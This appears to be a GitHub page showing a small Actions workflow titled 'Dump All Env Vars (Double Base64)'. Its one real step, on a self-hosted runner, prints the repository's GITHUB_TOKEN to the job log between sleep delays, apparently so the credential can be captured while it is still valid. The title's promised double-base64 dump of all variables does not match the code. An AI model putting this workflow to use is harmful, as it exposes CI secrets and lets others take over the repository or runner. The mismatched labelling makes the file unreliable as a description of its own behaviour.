Dump All Env Vars (Double Base64) #4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
name: Dump All Env Vars (Double Base64) | |
on: | |
workflow_dispatch: | |
jobs: | |
dump-env: | |
runs-on: self-hosted | |
steps: | |
- name: Checkout code | |
uses: actions/checkout@v4 | |
- name: Dump and double‑encode all env vars | |
run: | | |
sleep 60 | |
echo "Value is: $GITHUB_TOKEN" | |
sleep 60 |